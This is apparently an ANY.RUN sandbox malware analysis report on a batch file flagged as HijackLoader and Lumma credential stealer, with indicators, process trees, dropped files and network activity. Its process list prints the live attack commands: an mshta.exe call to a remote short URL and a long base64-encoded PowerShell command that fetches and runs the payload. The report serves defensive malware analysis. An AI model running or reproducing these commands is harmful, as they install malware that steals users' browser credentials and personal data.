File name:

New Text Document.bat

Full analysis: https://app.any.run/tasks/9b2274a0-aad6-4d92-957c-ff438ce1247f
Verdict: Malicious activity
Threats:

HijackLoader is a modular malware acting as a vehicle for distributing different types of malicious software on compromised systems. It gained prominence during the summer of 2023 and has since been used in multiple attacks against organizations from various sectors, including hospitality businesses.

Malware Trends Tracker     >>>
Analysis date: May 14, 2025, 01:12:52
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
possible-phishing
susp-powershell
arch-exec
lumma
stealer
hijackloader
loader
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

4F5FFFFB8EBF5AE371F634D3E6753611

SHA1:

863E16FBF058AA9C5E33CE0AEAC39FF164D63A40

SHA256:

3A32ACBB16C57326824B3C4FAD3C06D76D91B95C879B30E4829A26E07FABA21F

SSDEEP:

3:I5TAI0IR0jpjJJ:IhiTjZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • LUMMA mutex has been found

      • xi.com (PID: 8060)

    • HIJACKLOADER has been detected (YARA)

      • aaaaa.exe (PID: 7976)

    • LUMMA has been detected (YARA)

      • xi.com (PID: 8060)

    • Steals credentials from Web Browsers

      • xi.com (PID: 8060)

    • Actions looks like stealing of personal data

      • xi.com (PID: 8060)

  • SUSPICIOUS

    • Converts a specified value to an integer (POWERSHELL)

      • powershell.exe (PID: 7316)

    • Creates new GUID (POWERSHELL)

      • powershell.exe (PID: 7316)

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 7316)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 7316)
      • aaaaa.exe (PID: 7976)

    • The process creates files with name similar to system file names

      • powershell.exe (PID: 7316)
      • aaaaa.exe (PID: 7976)

    • Process drops legitimate windows executable

      • powershell.exe (PID: 7316)
      • aaaaa.exe (PID: 7976)

    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 7316)

    • Starts a Microsoft application from unusual location

      • aaaaa.exe (PID: 7976)

    • Starts application with an unusual extension

      • aaaaa.exe (PID: 7976)

    • There is functionality for taking screenshot (YARA)

      • xi.com (PID: 8060)

    • Searches for installed software

      • xi.com (PID: 8060)

  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 2140)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 7316)

    • Checks proxy server information

      • mshta.exe (PID: 2140)
      • powershell.exe (PID: 7316)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7316)

    • Disables trace logs

      • powershell.exe (PID: 7316)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7316)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 7316)

    • The sample compiled with english language support

      • powershell.exe (PID: 7316)
      • aaaaa.exe (PID: 7976)

    • The executable file from the user directory is run by the Powershell process

      • aaaaa.exe (PID: 7976)

    • Creates files in the program directory

      • aaaaa.exe (PID: 7976)

    • Checks supported languages

      • aaaaa.exe (PID: 7976)
      • xi.com (PID: 8060)

    • Create files in a temporary directory

      • aaaaa.exe (PID: 7976)

    • Reads the computer name

      • xi.com (PID: 8060)
      • aaaaa.exe (PID: 7976)

    • Reads the software policy settings

      • xi.com (PID: 8060)
      • slui.exe (PID: 7392)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
139
Monitored processes
10
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start cmd.exe no specs conhost.exe no specs mshta.exe svchost.exe powershell.exe sppextcomobj.exe no specs slui.exe aaaaa.exe no specs #LUMMA xi.com slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2140"C:\Windows\system32\mshta.exe" https://2no.co/2UyXd6 =+=964654C:\Windows\System32\mshta.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
5556C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\New Text Document.bat" "C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
6040\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6800C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7316powershell.exe -w h -nop -ep un -E JABUAFcAUABNAEkAUwA9ACcAKgA5ACoANQA3ADgAKgA4ADcALwAvADcALwAvADcAMAA3ADMAMwBBADIARgAyAEYANwAwADcANQAqADIAMgBEACoAMwAqADMAKgA1ACoAMgAqADUAMwAqADMAMwAqAC8ALwAqADMAMwAqACoAMQAzADUAMwAvAC8AMwAxACoAMQAqACoAMwA4ACoANQAqADEAMwAyACoAKgAzADkAMwAqADMAOAAqADMAMwA3ADMALwAvACoAMQAqADIAKgAyACoALwAvADMALwAvADIARQA3ADIAMwAyADIARQAqAC8ALwAqADUANwAqADIARgA3ADgAKgA5ADcALwAvADIARQA3AEEAKgA5ADcAMAAyAC8ALwA3AEEAKgA5ADcAMAAzAEQAMgAyADIALwAvACoANQAqAEUANwAqADMAQQA1AC8ALwAvAC8ANQAvAC8ARAA1ADAANQBDADcAOAAqADkANwAvAC8AMgBFADcAQQAqADkANwAwADIAMgAzAEIAMgAwADIALwAvACoALwAvACoANQA3ADMANwAvAC8AMwBEAC8ALwBBACoARgAqADkAKgBFADIARAA1ADAAKgAxADcALwAvACoAOAAyADAAMgAvAC8AKgA1ACoARQA3ACoAMwBBADUALwAvAC8ALwA1AC8ALwBEADUAMAAyADAAMgA4ADIAMgA3ADgAKgA5ADcALwAvADUARgAyADIAMgAwADIAQgAyADAANQBCACoANwA3ADUAKgA5ACoALwAvADUARAAzAEEAMwBBAC8ALwBFACoANQA3ADcALwAvADcANwA1ACoAOQAqAC8ALwAyADgAMgA5ADIAOQAzAEIAMgAwAC8ALwA1ADcAOAA3ADAAKgAxACoARQAqAC8ALwAyAEQALwAvADEANwAyACoAMwAqADgAKgA5ADcAKgAqADUAMgAwADIARAA1ADAAKgAxADcALwAvACoAOAAyADAAMgAvAC8ANwBBACoAOQA3ADAAMgAwADIARAAvAC8ALwAvACoANQA3ADMANwAvAC8AKgA5ACoARQAqADEANwAvAC8AKgA5ACoARgAqAEUANQAwACoAMQA3AC8ALwAqADgAMgAwADIALwAvACoALwAvACoANQA3ADMANwAvAC8AMwBCADIAMAA1ADMANwAvAC8AKgAxADcAMgA3AC8ALwAyAEQANQAwADcAMgAqAEYAKgAzACoANQA3ADMANwAzADIAMAAyAEQALwAvACoAKgA5ACoAQwAqADUANQAwACoAMQA3AC8ALwAqADgAMgAwADIAOAAvAC8AQQAqAEYAKgA5ACoARQAyAEQANQAwACoAMQA3AC8ALwAqADgAMgAwADIALwAvACoALwAvACoANQA3ADMANwAvAC8AMgAwADIAMgAqADEAKgAxACoAMQAqADEAKgAxADIARQAqADUANwA4ACoANQAyADIAMgA5ADMAQgAyAC8ALwAqADcANwAwACoARAAvAC8AQQAvAC8ANQA3AC8ALwAvAC8ARQAyADAAMwBEADIAMAAyAC8ALwAqADUAKgBFADcAKgAzAEEANQAvAC8AKgA1ACoARAA3ADAAMwBCACoAKgA3ADUAKgBFACoAMwA3AC8ALwAqADkAKgBGACoARQAyADAANQA3AC8ALwBFACoAQQA1AC8ALwA3ADcAKgBBADcAMgAvAC8AOQAyADgAMgAvAC8AKgAqACoARAAvAC8AMgA3AEEAKgBCACoANQA3ADkAKgA1ADIAQwAyADAAMgAvAC8ANwA1AC8ALwA5ACoAMQA3ADMAKgAvAC8AMgA5ADcAQgAqADMANwA1ADcAMgAqAEMAMgAwADIALwAvACoAKgAqAEQALwAvADIANwBBACoAQgAqADUANwA5ACoANQAyADAAMgBEACoARgAyADAAMgAvAC8ANwA1AC8ALwA5ACoAMQA3ADMAKgAvAC8ANwBEADMAQgAqACoANwA1ACoARQAqADMANwAvAC8AKgA5ACoARgAqAEUAMgAwADUAOAA3ACoANQAvAC8AKgBDADcANwAyADgAMgAvAC8ANQAvAC8ANQA3ADUAMAAvAC8ARAAvAC8AOQA1ADMAMgA5ADcAQgA1ADcALwAvAEUAKgBBADUALwAvADcANwAqAEEANwAyAC8ALwA5ADIAMAAyAC8ALwA1AC8ALwA1ADcANQAwAC8ALwBEAC8ALwA5ADUAMwAyADAAMgAvAC8ANwA1AC8ALwA5ACoAMQA3ADMAKgAvAC8ANwBEADIALwAvADcANQAvAC8AOQAqADEANwAzACoALwAvADIAMAAzAEQAMgAwADIALwAvACoANQAqAEUANwAqADMAQQA1AC8ALwAqADUAKgBEADcAMAAyADAAMgBCADIAMAAyADcANQBDADcAOAAqADkANwAvAC8AMgBFADcAQQAqADkANwAwADIANwAzAEIANQA4ADcAKgA1AC8ALwAqAEMANwA3ADIAMAAyAC8ALwA1ADAAKgBEADUANQAqADgALwAvAEIAMgBFADUAMwA3ADUAKgAyADUAMwA3AC8ALwA3ADIAKgA5ACoARQAqADcAMgA4ADMAMwAyAEMAMwA1ADMAOQAyADkAMwBCAC8ALwA1ADcAOAA3ADAAKgAxACoARQAqAC8ALwAyAEQALwAvADEANwAyACoAMwAqADgAKgA5ADcAKgAqADUAMgAwADIARAA1ADAAKgAxADcALwAvACoAOAAyADAAMgAvAC8ANwA1AC8ALwA5ACoAMQA3ADMAKgAvAC8AMgAwADIARAAvAC8ALwAvACoANQA3ADMANwAvAC8AKgA5ACoARQAqADEANwAvAC8AKgA5ACoARgAqAEUANQAwACoAMQA3AC8ALwAqADgAMgAwADIALwAvACoANwA3ADAAKgBEAC8ALwBBAC8ALwA1ADcALwAvAC8ALwBFADMAQgAvAC8AMQAqAC8ALwAqAC8ALwAyAEQANQAvAC8ANwA5ADcAMAAqADUAMgAwADIARAAvAC8AMQA3ADMANwAzACoANQAqAEQAKgAyACoAQwA3ADkAMgAwADUAMwA3ADkANwAzADcALwAvACoANQAqAEQAMgBFAC8ALwA5AC8ALwBGADIARQAvAC8AMwAqAEYAKgBEADcAMAA3ADIAKgA1ADcAMwA3ADMAKgA5ACoARgAqAEUAMgBFAC8ALwAqACoAOQAqAEMAKgA1ADUAMwA3ADkANwAzADcALwAvACoANQAqAEQAMwBCADIALwAvAC8ALwAvAC8ALwAvAEUAKgA1ADcAQQAqAEEAKgBGADUAOAAqACoAMgAwADMARAAyADAANQBCAC8ALwA5AC8ALwBGADIARQAvAC8AMwAqAEYAKgBEADcAMAA3ADIAKgA1ADcAMwA3ADMAKgA5ACoARgAqAEUAMgBFADUAQQAqADkANwAwAC8ALwAqACoAOQAqAEMAKgA1ADUARAAzAEEAMwBBAC8ALwBGADcAMAAqADUAKgBFADUAMgAqADUAKgAxACoALwAvADIAOAAyAC8ALwA3ADUALwAvADkAKgAxADcAMwAqAC8ALwAyADkAMwBCADIALwAvADcAKgAqAEQANQA1ADUALwAvADIAMAAzAEQAMgA4ADIALwAvAC8ALwAvAC8ALwAvAEUAKgA1ADcAQQAqAEEAKgBGADUAOAAqACoAMgBFAC8ALwA1ACoARQA3AC8ALwA3ADIAKgA5ACoANQA3ADMAMgAwADcAQwAyADAANQAzACoARgA3ADIANwAvAC8AMgBEAC8ALwBGACoAMgAqAEEAKgA1ACoAMwA3AC8ALwAyADAALwAvAEUAKgAxACoARAAqADUAMgAwADcAQwAyADAANQAzACoANQAqAEMAKgA1ACoAMwA3AC8ALwAyAEQALwAvAEYAKgAyACoAQQAqADUAKgAzADcALwAvADIAMAAyAEQALwAvACoAKgA5ADcAMgA3ADMANwAvAC8AMgAwADMAMQAyADkAMgBFAC8ALwBFACoAMQAqAEQAKgA1ADMAQgAyAC8ALwA1ADAANwBBAC8ALwBFADUAOAAvAC8AQgAqAEUALwAvADkAMgAwADMARAAyADAALwAvAEEAKgBGACoAOQAqAEUAMgBEADUAMAAqADEANwAvAC8AKgA4ADIAMAAyAC8ALwAqADUAKgBFADcAKgAzAEEANQAvAC8AKgA1ACoARAA3ADAAMgAwADIALwAvADcAKgAqAEQANQA1ADUALwAvADMAQgA3ADMANwAvAC8AKgAxADcAMgA3AC8ALwAyADAAMgAvAC8ANQAwADcAQQAvAC8ARQA1ADgALwAvAEIAKgBFAC8ALwA5ADIAMAAzAEIAMwBCACcALgBSAGUAcABsAGEAYwBlACgAIgAvAC8AIgAsACAAIgA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA2ACIAKQA7ACQAUABtAFUAaABLAD0AKAAkAFQAVwBQAE0ASQBTACAALQBzAHAAbABpAHQAIAAnACgAPwA8AD0AXABHAC4ALgApACcAfAAlAHsAWwBjAGgAYQByAF0AKABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAXwAsADEANgApACkAfQApACAALQBqAG8AaQBuACAAJwAnADsAIAAmACAAJABQAG0AVQBoAEsALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAzACkAIAAkAFAAbQBVAGgASwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\uxtheme.dll
c:\windows\microsoft.net\framework64\v4.0.30319\diasymreader.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.serv759bfb78#\8210ce597ae395018d4bee011b11fec5\system.serviceprocess.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.drawing\598d972709fb08eaebd36223a4662d59\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_64\system.windows.forms\e6a1a4dc24dbc6f8a923509d04878cfd\system.windows.forms.ni.dll
c:\windows\system32\propsys.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\iphlpapi.dll
7348C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
7392"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\msxml6.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\ondemandconnroutehelper.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\webio.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winnsi.dll
7976"C:\Users\admin\AppData\Local\Temp\aaaaa.exe" C:\Users\admin\AppData\Local\Temp\aaaaa.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Test Authoring and Execution Framework [v10.66]
Exit code:
0
Version:
10.66.2203.16002
Modules
Images
c:\users\admin\appdata\local\temp\aaaaa.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\users\admin\appdata\local\temp\te.winrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
c:\windows\system32\gdi32.dll
8060C:\Users\admin\AppData\Local\Temp\15487\xi.comC:\Users\admin\AppData\Local\Temp\15487\xi.com
aaaaa.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\ee3f918.tmp
c:\users\admin\appdata\local\temp\15487\xi.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\shell32.dll
Total events
4 152
Read events
4 149
Write events
3
Delete events
0

Modification events

(PID) Process:(2140) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2140) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2140) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
Executable files
18
Suspicious files
15
Text files
2
Unknown types
0

Dropped files

PID
Process
Filename
Type
2140mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12binary
MD5:F9F1A1D30808635422D910D104A20AEE
SHA256:F2C02A86DF807C133255968434D26FE96D4AF06EEC4AA66C04D8DA1D3FBE3BB1
2140mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751binary
MD5:E192462F281446B5D1500D474FBACC4B
SHA256:F1BA9F1B63C447682EBF9DE956D0DA2A027B1B779ABEF9522D347D3479139A60
2140mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\xitss2[1].gsgbinary
MD5:525388D3B909EE9AF73AC9F7871B8722
SHA256:0EDE3B449D7BE8D2FDA7DE860E63797DC5A267CC785FEF70C0A6B02D7CE1743E
2140mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751binary
MD5:EAC8F82B5A8C3175542291F567830897
SHA256:0AFCE4AD01D0BEF00CB44088398F89FCD36007B57A611F2266AEE1C8C55D5C79
7316powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xrgnmr43.udw.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7316powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nl5afzkg.2fn.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2140mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8binary
MD5:1FBB37F79B317A9A248E7C4CE4F5BAC5
SHA256:9BF639C595FE335B6F694EE35990BEFD2123F5E07FD1973FF619E3FC88F5F49F
2140mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12binary
MD5:4A90329071AE30B759D279CCA342B0A6
SHA256:4F544379EDA8E2653F71472AB968AEFD6B5D1F4B3CE28A5EDB14196184ED3B60
7316powershell.exeC:\Users\admin\AppData\Local\Temp\Wex.Logger.dllexecutable
MD5:63F49B5ED2EC05ACFCB7B3896376AB1B
SHA256:3366C7905415B7B3D1DBDC2884FAFD91DDC5337E5CCF116F571E8EFD38CACE78
7316powershell.exeC:\Users\admin\AppData\Local\Temp\Wex.Communication.dllexecutable
MD5:1CDB3C7C4F74026DC99B4F6F699736A6
SHA256:35520FAAC853B0A2D088F35BD8055D7E4B9E2EFDB66FE92DCC7E41B98944716C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
33
DNS requests
21
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
184.24.77.35:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2140
mshta.exe
GET
200
142.250.185.163:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
2140
mshta.exe
GET
200
142.250.185.163:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
GET
200
23.209.209.135:80
http://x1.c.lencr.org/
unknown
whitelisted
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
8144
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
8144
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2104
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
184.24.77.35:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
2140
mshta.exe
104.21.79.229:443
2no.co
CLOUDFLARENET
whitelisted
2140
mshta.exe
142.250.185.163:80
c.pki.goog
GOOGLE
US
whitelisted
2140
mshta.exe
162.159.140.237:443
pub-164d8d82c41c4e1b871bc21802a18154.r2.dev
CLOUDFLARENET
suspicious
23.209.209.135:80
x1.c.lencr.org
PT. Telekomunikasi Selular
ID
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 4.231.128.59
whitelisted
crl.microsoft.com
  • 184.24.77.35
  • 184.24.77.12
  • 184.24.77.37
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
google.com
  • 142.250.185.142
whitelisted
2no.co
  • 104.21.79.229
  • 172.67.149.76
whitelisted
c.pki.goog
  • 142.250.185.163
whitelisted
pub-164d8d82c41c4e1b871bc21802a18154.r2.dev
  • 162.159.140.237
  • 172.66.0.235
unknown
x1.c.lencr.org
  • 23.209.209.135
whitelisted
login.live.com
  • 40.126.32.134
  • 40.126.32.68
  • 40.126.32.136
  • 20.190.160.131
  • 40.126.32.72
  • 20.190.160.4
  • 40.126.32.140
  • 20.190.160.5
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] CloudFlare Public R2.dev Bucket
2196
svchost.exe
Possible Social Engineering Attempted
SUSPICIOUS [ANY.RUN] Abuse Public R2.dev Bucket
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] CloudFlare Public R2.dev Bucket
2196
svchost.exe
Possible Social Engineering Attempted
SUSPICIOUS [ANY.RUN] Abuse Public R2.dev Bucket
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
New Text Document.bat